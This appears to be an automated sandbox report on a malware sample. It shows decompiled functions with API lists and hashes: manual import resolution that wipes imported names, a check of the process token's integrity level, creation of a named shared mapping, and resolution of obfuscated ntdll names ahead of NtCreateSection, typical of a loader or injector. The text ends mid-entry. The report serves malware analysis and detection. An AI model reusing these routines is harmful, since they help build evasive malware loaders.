Opcode ID: a86692af418ab843cccc9d148decf6b16cdb1482912b8cac69082666f09a9597
Instruction ID: 6c1aea532f8718a374702e4e26cb0549d1bf87b472e413a41840f7014c88c454
Opcode Fuzzy Hash: a86692af418ab843cccc9d148decf6b16cdb1482912b8cac69082666f09a9597
Instruction Fuzzy Hash: 9E313FB6D00208BFDB20AFA4DC8CDAEBBBDEF08384F000965E656A7211D7349E54DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02F61A4E, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02F61A4E(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02F6B082();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2f6d2a4; // 0xb3a5a8
				_t5 = _t13 + 0x2f6e836; // 0x3aa8dde
				_t6 = _t13 + 0x2f6e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02F6AD1A();
				_t17 = CreateFileMappingW(0xffffffff, 0x2f6d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x02f61a4e
0x02f61a56
0x02f61a5a
0x02f61a60
0x02f61a65
0x02f61a6a
0x02f61a6d
0x02f61a70
0x02f61a75
0x02f61a76
0x02f61a79
0x02f61a7e
0x02f61a85
0x02f61a8f
0x02f61a91
0x02f61a92
0x02f61a95
0x02f61ab1
0x02f61ab7
0x02f61abb
0x02f61b09
0x02f61abd
0x02f61aca
0x02f61ada
0x02f61ae2
0x02f61af4
0x02f61af8
0x00000000
0x00000000
0x02f61ae4
0x02f61ae7
0x02f61aec
0x02f61aee
0x02f61aee
0x02f61acc
0x02f61ace
0x02f61afa
0x02f61afb
0x02f61afb
0x02f61aca
0x02f61b10

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,02F64996,?,?,4D283A53,?,?), ref: 02F61A5A
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02F61A70
_snwprintf.NTDLL ref: 02F61A95
CreateFileMappingW.KERNELBASE(000000FF,02F6D2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 02F61AB1
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,02F64996,?,?,4D283A53,?), ref: 02F61AC3
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 02F61ADA
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,02F64996,?,?,4D283A53), ref: 02F61AFB
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,02F64996,?,?,4D283A53,?), ref: 02F61B03

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 90df85bae8a31da7ddeb9052600d7ce3db66dff331adfd727ab6af802cc5402c
Instruction ID: 1befcb3e73a69bcba14a14d556467a6bdca296dffc4af9bc79eb79b71c223e10
Opcode Fuzzy Hash: 90df85bae8a31da7ddeb9052600d7ce3db66dff331adfd727ab6af802cc5402c
Instruction Fuzzy Hash: 9721C676A40208BFD711EB68CD4DFAA77B9EB44B81F154121F759E7280E770D914CB60

Uniqueness

Uniqueness Score: -1.00%

Function 015115C2, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E015115C2(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62); // executed
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}

0x015115cb
0x015115d1
0x015115d6
0x015115db
0x015116dc
0x015116e1
0x015116e1
0x015115e2
0x015115e5
0x015115e8
0x015115ed
0x015116db
0x00000000
0x015116db
0x015115f4
0x015115f4
0x015115f8
0x015115fe
0x01511603
0x00000000
0x00000000
0x01511609
0x01511618
0x0151161d
0x0151161f
0x01511622
0x01511627
0x01511633
0x01511633
0x01511636
0x0151163a
0x015116c0
0x015116c0
0x015116c3
0x015116c6
0x015116cb
0x00000000
0x00000000
0x015116da
0x00000000
0x015116da
0x01511644
0x01511647
0x00000000
0x01511649
0x01511649
0x01511652
0x01511667
0x01511669
0x01511660
0x01511660
0x01511660
0x0151164b
0x0151164b
0x0151164b
0x0151166c
0x0151166c
0x01511671
0x01511673
0x01511673
0x0151167b
0x01511681
0x01511686
0x00000000
0x00000000
0x0151168a
0x0151168c
0x0151169a
0x0151169f
0x0151169f
0x015116a8
0x015116ab
0x015116ae
0x015116b2
0x00000000
0x015116b4
0x015116bd
0x015116bd
0x00000000
0x015116bd
0x015116b6
0x015116b6
0x00000000
0x015116b6
0x01511629
0x0151162d
0x00000000
0x00000000
0x00000000
0x0151162d
0x015116d3
0x00000000

APIs

LoadLibraryA.KERNELBASE ref: 015115F8
lstrlenA.KERNEL32 ref: 0151160E
memset.NTDLL ref: 01511618
GetProcAddress.KERNEL32(?,00000002), ref: 0151167B
lstrlenA.KERNEL32(-00000002), ref: 01511690
memset.NTDLL ref: 0151169A

Strings

~, xrefs: 015116D3

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID: lstrlenmemset$AddressLibraryLoadProc
String ID: ~
API String ID: 1986585659-1707062198
Opcode ID: fadece1b3ec614343402ed0ac00e72ce014b728a310e337ebd00b961a519221e
Instruction ID: 322f3e0fec611f9bf3262cd7815c4daefad526d111c224e5aa351bfb11e7ed8f
Opcode Fuzzy Hash: fadece1b3ec614343402ed0ac00e72ce014b728a310e337ebd00b961a519221e
Instruction Fuzzy Hash: 7F31B5B5A00A16DBEF12CF29C8D0BAD7BF4BF44240F1945A9EA05DF604D731EA05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02F653E3, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F653E3(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2f6d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02F658BE(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02F6147E(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x02f653f0
0x02f653f7
0x02f653fe
0x02f65412
0x02f6541d
0x02f65435
0x02f65442
0x02f65445
0x02f6544a
0x02f65455
0x02f65459
0x02f65468
0x02f6546c
0x02f65488
0x02f65488
0x02f6548c
0x02f6548c
0x02f65491
0x02f65495
0x02f6549b
0x02f6549c
0x02f654a3
0x02f654a9

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02F65415
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02F65435
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02F65445
CloseHandle.KERNEL32(00000000), ref: 02F65495

Part of subcall function 02F658BE: RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02F65468
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02F65470
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02F65480

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: d7666ef33c08595b55ce46c0266f6fb66cbbdc311d5b06b1b64caefa08ce0dda
Instruction ID: ee2bedea9aed8f1e2aa764fa01ebcd9bad7a691a52e6d60fa95fa54f926f1bac
Opcode Fuzzy Hash: d7666ef33c08595b55ce46c0266f6fb66cbbdc311d5b06b1b64caefa08ce0dda
Instruction Fuzzy Hash: 31215975E0021DFFEB009FA0DD88EAEBBB9EB09744F0040A5E610B6251C7718A15EF60

Uniqueness

Uniqueness Score: -1.00%

Function 01511954, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x1514108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x151410c;
						if( *0x151410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1); // executed
								__eflags =  *0x1514118;
								if( *0x1514118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x151410c);
						}
						HeapDestroy( *0x1514110); // executed
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x1514108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x1514110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x1514130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E0151103B, E0151105A(_a12, 0, 0x1514118, _t41), 0,  &_a8); // executed
							 *0x151410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x01511957
0x01511963
0x01511965
0x01511968
0x015119e2
0x015119e8
0x015119ea
0x015119ec
0x015119f2
0x015119f4
0x015119f9
0x015119fc
0x01511a07
0x01511a09
0x00000000
0x00000000
0x01511a0b
0x01511a0e
0x01511a10
0x00000000
0x00000000
0x00000000
0x01511a10
0x01511a18
0x01511a18
0x01511a24
0x01511a24
0x0151196a
0x0151196b
0x0151198b
0x01511991
0x01511996
0x01511998
0x015119d8
0x015119d8
0x0151199a
0x015119a2
0x015119a9
0x015119c2
0x015119c8
0x015119cf
0x015119d4
0x00000000
0x015119d4
0x015119cf
0x01511998
0x0151196b
0x01511a31

APIs

InterlockedIncrement.KERNEL32(01514108), ref: 01511976
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0151198B
CreateThread.KERNELBASE ref: 015119C2
InterlockedDecrement.KERNEL32(01514108), ref: 015119E2
SleepEx.KERNELBASE(00000064,00000001), ref: 015119FC
CloseHandle.KERNEL32 ref: 01511A18
HeapDestroy.KERNELBASE ref: 01511A24

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
String ID:
API String ID: 3416589138-0
Opcode ID: c4565fdd27fd9933a62c4bae0de8d076e3ed4bfb55af8d9b9543d7c1fd74bbad
Instruction ID: e4ffbc24e457b731009030570be2ceadabf517896819c9493375ec73d951279d
Opcode Fuzzy Hash: c4565fdd27fd9933a62c4bae0de8d076e3ed4bfb55af8d9b9543d7c1fd74bbad
Instruction Fuzzy Hash: 4821B032B40605AFE723DF7D988496D7BF4F765760B124069FA21DF148E37089049B90

Uniqueness

Uniqueness Score: -1.00%

Function 02F6A060, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 02F6A09B
IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 02F6A11E
StrStrIW.SHLWAPI(00000000,006E0069), ref: 02F6A15E
SysFreeString.OLEAUT32(00000000), ref: 02F6A180

Part of subcall function 02F691B5: SysAllocString.OLEAUT32(02F6C298), ref: 02F69205

SafeArrayDestroy.OLEAUT32(00000000), ref: 02F6A1D3
SysFreeString.OLEAUT32(00000000), ref: 02F6A1E2

Part of subcall function 02F6A872: Sleep.KERNELBASE(000001F4), ref: 02F6A8BA

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 90674eec8bab29429dbe9e9deed0cdbe4317075583e80ed7b2dfbfa31c8b3021
Instruction ID: df2021adb3b818127443c2774ba9e77bbdd6521c44a26e5f020c3f090311e3c0
Opcode Fuzzy Hash: 90674eec8bab29429dbe9e9deed0cdbe4317075583e80ed7b2dfbfa31c8b3021
Instruction Fuzzy Hash: DF514635900609BFDB01DFA8C848AAEB7B6FF88784B148859E655EB210EB35DD45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02F6135B, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02F61EEA: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,03AA89D8,02F61389,?,?,?,?,?,?,?,?,?,?,?,02F61389), ref: 02F61FB7

Part of subcall function 02F6A555: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 02F6A592
Part of subcall function 02F6A555: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 02F6A5C3

SysAllocString.OLEAUT32(00000000), ref: 02F613B5
SysAllocString.OLEAUT32(0070006F), ref: 02F613C9
SysAllocString.OLEAUT32(00000000), ref: 02F613DB
SysFreeString.OLEAUT32(00000000), ref: 02F61443
SysFreeString.OLEAUT32(00000000), ref: 02F61452
SysFreeString.OLEAUT32(00000000), ref: 02F6145D

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
String ID:
API String ID: 2831207796-0
Opcode ID: 3dc0baa82320ecd132fb120725cd6b7fd89a02119181a931f445efb3c561357c
Instruction ID: 8867aaff06d7039df0c240b9e6256b4fe03c53e181fc19ff39dd42967da59291
Opcode Fuzzy Hash: 3dc0baa82320ecd132fb120725cd6b7fd89a02119181a931f445efb3c561357c
Instruction Fuzzy Hash: 1C413E36D00609ABDB01DFF8D948AAFB7BAEF49345F144426EE14EB220DB71D905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01511F61, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01511F61(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E01511026(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x1514144 + 0x1515014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x1514144 + 0x151514c);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E01511938(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x1514144 + 0x151515c);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x1514144 + 0x151516f);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x1514144 + 0x1515184);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x1514144 + 0x151519a);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E01511A34(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x01511f70
0x01511f74
0x01512036
0x01511f7a
0x01511f92
0x01511fa1
0x01511fa8
0x01511faa
0x01511faf
0x0151202e
0x0151202f
0x01511fb1
0x01511fbe
0x01511fc0
0x01511fc5
0x00000000
0x01511fc7
0x01511fd4
0x01511fd6
0x01511fdb
0x00000000
0x01511fdd
0x01511fea
0x01511fec
0x01511ff1
0x00000000
0x01511ff3
0x01512000
0x01512002
0x01512007
0x00000000
0x01512009
0x0151200f
0x01512014
0x0151201b
0x01512020
0x01512025
0x00000000
0x01512027
0x0151202a
0x0151202a
0x01512025
0x01512007
0x01511ff1
0x01511fdb
0x01511fc5
0x01511faf
0x01512044

APIs

Part of subcall function 01511026: HeapAlloc.KERNEL32(00000000,?,01511329,00000208,?,-00000008,?,?,?,0151122F,?), ref: 01511032

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,01511B06,?,?,?,?,00000002,?,0151178F), ref: 01511F86
GetProcAddress.KERNEL32(00000000,?), ref: 01511FA8
GetProcAddress.KERNEL32(00000000,?), ref: 01511FBE
GetProcAddress.KERNEL32(00000000,?), ref: 01511FD4
GetProcAddress.KERNEL32(00000000,?), ref: 01511FEA
GetProcAddress.KERNEL32(00000000,?), ref: 01512000

Part of subcall function 01511A34: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 01511A91
Part of subcall function 01511A34: memset.NTDLL ref: 01511AB3

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: e9227961bc5897c0b30fa8de623ee2c3855ab586ead8d8ae9ac4725c6c1ff878
Instruction ID: 314a5851e5d943043a99f34afd78a79920d6b339000ef4ca848e45d1a2ad0635
Opcode Fuzzy Hash: e9227961bc5897c0b30fa8de623ee2c3855ab586ead8d8ae9ac4725c6c1ff878
Instruction Fuzzy Hash: B0217EB06406069FE723DF69D884E5ABBECFF54300B055126E514DF208EBB0E908CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02F657D8, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F657D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02F658BE(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2f6d2a4; // 0xb3a5a8
					_t1 = _t23 + 0x2f6e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2f6d2a4; // 0xb3a5a8
					_t2 = _t26 + 0x2f6e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02F6147E(_t54);
					} else {
						_t30 =  *0x2f6d2a4; // 0xb3a5a8
						_t5 = _t30 + 0x2f6e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2f6d2a4; // 0xb3a5a8
							_t7 = _t33 + 0x2f6e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2f6d2a4; // 0xb3a5a8
								_t9 = _t36 + 0x2f6e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2f6d2a4; // 0xb3a5a8
									_t11 = _t39 + 0x2f6e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02F67B01(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x02f657e7
0x02f657eb
0x02f658ad
0x02f657f1
0x02f657f1
0x02f657f6
0x02f65809
0x02f6580b
0x02f65810
0x02f65818
0x02f6581f
0x02f65821
0x02f65826
0x02f658a5
0x02f658a6
0x02f65828
0x02f65828
0x02f6582d
0x02f65835
0x02f65837
0x02f6583c
0x00000000
0x02f6583e
0x02f6583e
0x02f65843
0x02f6584b
0x02f6584d
0x02f65852
0x00000000
0x02f65854
0x02f65854
0x02f65859
0x02f65861
0x02f65863
0x02f65868
0x00000000
0x02f6586a
0x02f6586a
0x02f6586f
0x02f65877
0x02f65879
0x02f6587e
0x00000000
0x02f65880
0x02f65886
0x02f6588b
0x02f65892
0x02f65897
0x02f6589c
0x00000000
0x02f6589e
0x02f658a1
0x02f658a1
0x02f6589c
0x02f6587e
0x02f65868
0x02f65852
0x02f6583c
0x02f65826
0x02f658bb

APIs

Part of subcall function 02F658BE: RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02F614AF,?,?,?,?,00000000,00000000), ref: 02F657FD
GetProcAddress.KERNEL32(00000000,7243775A), ref: 02F6581F
GetProcAddress.KERNEL32(00000000,614D775A), ref: 02F65835
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02F6584B
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02F65861
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02F65877

Part of subcall function 02F67B01: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,02F65897), ref: 02F67B5E
Part of subcall function 02F67B01: memset.NTDLL ref: 02F67B80

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: 4a8184bc40d8e8a21d8ffbdb5a36565710eb34dde37eee6b8a079dc7c3ecfbf6
Instruction ID: 116426af3cfc20fe7b97ad454d8eb9bf0a4c5c5d3704c594d77615d4ea814195
Opcode Fuzzy Hash: 4a8184bc40d8e8a21d8ffbdb5a36565710eb34dde37eee6b8a079dc7c3ecfbf6
Instruction Fuzzy Hash: EE2121B5A0170AEFDB10DFB9C94CD66B7ECEF443847054425E659DB610DB70EA05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02F662CD, Relevance: 9.1, APIs: 6, Instructions: 75
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 79%

